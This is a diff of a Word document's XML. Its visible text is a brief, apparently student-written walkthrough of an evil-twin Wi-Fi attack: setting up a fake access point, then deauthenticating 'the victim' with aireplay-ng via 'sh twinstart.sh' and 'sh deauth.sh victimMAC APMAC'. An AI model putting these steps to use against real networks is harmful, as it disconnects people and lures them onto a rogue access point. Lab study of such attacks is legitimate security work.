+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> following step will be:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61038563" wp14:editId="50650F08">
+            <wp:extent cx="4260994" cy="6435436"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="1" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4267319" cy="6444989"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">fter the fake AP created, now we can </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>balenaEtcher</w:t>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>deauth</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to install the OS into the raspberry Pi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, after </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>it</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the victim </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">by using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>aireplay</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>-ng</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB12081" wp14:editId="190222AC">
+            <wp:extent cx="4378036" cy="1355585"/>
+            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
+            <wp:docPr id="6" name="Picture 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4389370" cy="1359094"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We write the shell script to execute </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">As we have described functionality of command above, </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>the script for setup fake AP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> will be </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>```</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>twinstart.sh</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>```</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76A787CE" wp14:editId="0DA87AD4">
+            <wp:extent cx="3685309" cy="1348019"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="4" name="Picture 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3699088" cy="1353059"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The script for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>deauthencating</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (force victim to disconnect to real AP)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>```</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>deauth</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>.sh</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>turn</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>on</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">we open the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>term</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">inal and </w:t>
-      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>imput</w:t>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>victimMAC</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>`</w:t>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> APMAC</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>```</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="655055C9" wp14:editId="3C3B5EA2">
+            <wp:extent cx="4007659" cy="1898072"/>
+            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
+            <wp:docPr id="5" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4010145" cy="1899249"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
